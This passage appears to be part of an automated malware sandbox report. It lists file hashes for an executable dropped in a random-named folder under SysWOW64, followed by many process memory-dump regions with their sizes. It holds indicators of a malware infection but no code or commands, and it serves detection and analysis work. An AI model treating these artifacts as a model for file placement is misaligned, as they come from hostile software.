                          0bc8cdb0f06c2fb6486ea13cb322b6badcdaa286d4757e08672e5886982d6d5d082ad824207cf7093001744612259e5d3af6f4a9f4420c437cdae369218d247f

                        • C:\Windows\SysWOW64\ozzuhzec\ysmkjbit.exe
                          MD5

                          5f0fc4207a94294bace35698d9f48c27

                          SHA1

                          fd0a089ef060a68d72a383470ca369a4a6285ad5

                          SHA256

                          a9707b567afe76d8126ef753d825f6959610c8858084b672ed87a9878fe18638

                          SHA512

                          6a13a527db2d997b17e0f608dc33da5b8e14c4b0fa3f0258ca2670713e603586cfc83129659fad629c725758f1ef10d65666a1cee896a0328d0f17bddcb74779

                        • memory/712-179-0x0000000000400000-0x0000000000619000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/712-177-0x0000000002110000-0x00000000021A2000-memory.dmp
                          Filesize

                          584KB

                        • memory/1588-132-0x0000000000400000-0x0000000000409000-memory.dmp
                          Filesize

                          36KB

                        • memory/1588-133-0x0000000000400000-0x0000000000409000-memory.dmp
                          Filesize

                          36KB

                        • memory/1888-146-0x0000000005700000-0x000000000571E000-memory.dmp
                          Filesize

                          120KB

                        • memory/1888-147-0x0000000005E50000-0x00000000063F4000-memory.dmp
                          Filesize

                          5.6MB

                        • memory/1888-145-0x0000000005720000-0x0000000005796000-memory.dmp
                          Filesize

                          472KB

                        • memory/1888-152-0x0000000005680000-0x00000000058A0000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/1888-153-0x0000000005680000-0x00000000058A0000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/1888-144-0x0000000000D40000-0x0000000000DCA000-memory.dmp
                          Filesize

                          552KB

                        • memory/2308-134-0x0000000000CB0000-0x0000000000CC6000-memory.dmp
                          Filesize

                          88KB

                        • memory/2308-157-0x0000000003180000-0x0000000008000000-memory.dmp
                          Filesize

                          78.5MB

                        • memory/2392-249-0x0000000000200000-0x000000000021A000-memory.dmp
                          Filesize

                          104KB

                        • memory/2392-251-0x000000001AC30000-0x000000001AC32000-memory.dmp
                          Filesize

                          8KB

                        • memory/2484-217-0x00007FF7FCDA0000-0x00007FF7FD6CE000-memory.dmp
                          Filesize

                          9.2MB

                        • memory/2484-218-0x00007FF7FCDA0000-0x00007FF7FD6CE000-memory.dmp
                          Filesize

                          9.2MB

                        • memory/2484-219-0x0000000000940000-0x0000000000952000-memory.dmp
                          Filesize

                          72KB

                        • memory/2484-220-0x0000000021EF0000-0x0000000021EF2000-memory.dmp
                          Filesize

                          8KB

                        • memory/2872-230-0x00000000073C0000-0x0000000007410000-memory.dmp
                          Filesize

                          320KB

                        • memory/2872-200-0x0000000001300000-0x0000000001301000-memory.dmp
                          Filesize

                          4KB

                        • memory/2872-233-0x0000000008510000-0x0000000008A3C000-memory.dmp
                          Filesize

                          5.2MB

                        • memory/2872-232-0x0000000007720000-0x00000000078E2000-memory.dmp
                          Filesize

                          1.8MB

                        • memory/2872-222-0x00000000069A0000-0x0000000006A06000-memory.dmp
                          Filesize

                          408KB

                        • memory/2872-221-0x0000000005EE0000-0x0000000005F72000-memory.dmp
                          Filesize

                          584KB

                        • memory/2872-213-0x0000000070680000-0x00000000706CC000-memory.dmp
                          Filesize

                          304KB

                        • memory/2872-214-0x0000000005960000-0x0000000005A11000-memory.dmp
                          Filesize

                          708KB

                        • memory/2872-198-0x0000000002EA0000-0x0000000002EE4000-memory.dmp
                          Filesize

                          272KB

                        • memory/2872-199-0x0000000000C80000-0x0000000000CF3000-memory.dmp
                          Filesize

                          460KB

                        • memory/2872-201-0x0000000075BE0000-0x0000000075DF5000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/2872-212-0x0000000076BA0000-0x0000000077153000-memory.dmp
                          Filesize

                          5.7MB

                        • memory/2872-202-0x0000000000C80000-0x0000000000CF3000-memory.dmp
                          Filesize

                          460KB

                        • memory/2872-203-0x0000000000C80000-0x0000000000CF3000-memory.dmp
                          Filesize

                          460KB

                        • memory/2872-204-0x00000000726B0000-0x0000000072739000-memory.dmp
                          Filesize

                          548KB

                        • memory/2872-205-0x0000000006040000-0x0000000006658000-memory.dmp
                          Filesize

                          6.1MB

                        • memory/2872-207-0x0000000005A20000-0x0000000005A32000-memory.dmp
                          Filesize

                          72KB

                        • memory/2872-211-0x0000000005A80000-0x0000000005ABC000-memory.dmp
                          Filesize

                          240KB

                        • memory/2872-210-0x0000000005B50000-0x0000000005C5A000-memory.dmp
                          Filesize

                          1.0MB

                        • memory/2932-209-0x0000000000400000-0x000000000045B000-memory.dmp
                          Filesize

                          364KB

                        • memory/2932-206-0x00000000001C0000-0x00000000001D1000-memory.dmp
                          Filesize

                          68KB

                        • memory/2932-208-0x00000000001E0000-0x00000000001FC000-memory.dmp
                          Filesize

                          112KB

                        • memory/3080-170-0x00000000049D0000-0x00000000049D5000-memory.dmp
                          Filesize

                          20KB

                        • memory/3080-164-0x0000000004600000-0x000000000480F000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/3080-186-0x0000000009DF0000-0x0000000009DF7000-memory.dmp
                          Filesize

                          28KB

                        • memory/3080-166-0x00000000021F0000-0x00000000021F6000-memory.dmp
                          Filesize

                          24KB

                        • memory/3080-168-0x00000000037B0000-0x00000000037C0000-memory.dmp
                          Filesize

                          64KB

                        • memory/3080-184-0x00000000099E0000-0x0000000009DEB000-memory.dmp
                          Filesize

                          4.0MB

                        • memory/3080-160-0x0000000002130000-0x0000000002145000-memory.dmp
                          Filesize

                          84KB

                        • memory/3204-149-0x0000000000400000-0x0000000000409000-memory.dmp
                          Filesize

                          36KB

                        • memory/3212-180-0x0000000000400000-0x0000000000619000-memory.dmp
                          Filesize

                          2.1MB

                        • memory/3212-178-0x00000000009B0000-0x0000000000A1B000-memory.dmp
                          Filesize

                          428KB

                        • memory/3276-163-0x0000000000400000-0x0000000000457000-memory.dmp
                          Filesize

                          348KB

                        • memory/3348-141-0x0000000000030000-0x0000000000038000-memory.dmp
                          Filesize

                          32KB

                        • memory/3472-260-0x0000000013EA0000-0x0000000013EC0000-memory.dmp
                          Filesize

                          128KB

                        • memory/3472-255-0x0000000140000000-0x000000014097B000-memory.dmp
                          Filesize

                          9.5MB

                        • memory/3472-257-0x0000000001F50000-0x0000000001F7F000-memory.dmp
                          Filesize

                          188KB

                        • memory/3472-259-0x0000000013E80000-0x0000000013EA0000-memory.dmp
                          Filesize

                          128KB

                        • memory/3472-252-0x0000000140000000-0x000000014097B000-memory.dmp
                          Filesize

                          9.5MB

                        • memory/3508-158-0x0000000000400000-0x0000000000420000-memory.dmp
                          Filesize

                          128KB

                        • memory/3544-245-0x00007FF642EE0000-0x00007FF64380E000-memory.dmp
                          Filesize

                          9.2MB

                        • memory/3544-246-0x00007FF642EE0000-0x00007FF64380E000-memory.dmp
                          Filesize

                          9.2MB

                        • memory/3600-192-0x0000000002800000-0x00000000028F1000-memory.dmp
                          Filesize

                          964KB

                        • memory/3600-188-0x0000000002800000-0x00000000028F1000-memory.dmp
                          Filesize

                          964KB

                        • memory/3632-151-0x00000000001C0000-0x00000000001D3000-memory.dmp
                          Filesize

                          76KB

                        • memory/3632-150-0x0000000000030000-0x000000000003D000-memory.dmp
                          Filesize

                          52KB

                        • memory/3632-154-0x0000000000400000-0x0000000000457000-memory.dmp
                          Filesize

                          348KB

                        • memory/3868-131-0x00000000001D0000-0x00000000001D9000-memory.dmp
                          Filesize

                          36KB

                        • memory/3868-130-0x0000000000030000-0x0000000000038000-memory.dmp
                          Filesize

                          32KB

                        • memory/3984-183-0x00000000025E0000-0x0000000002640000-memory.dmp
                          Filesize

                          384KB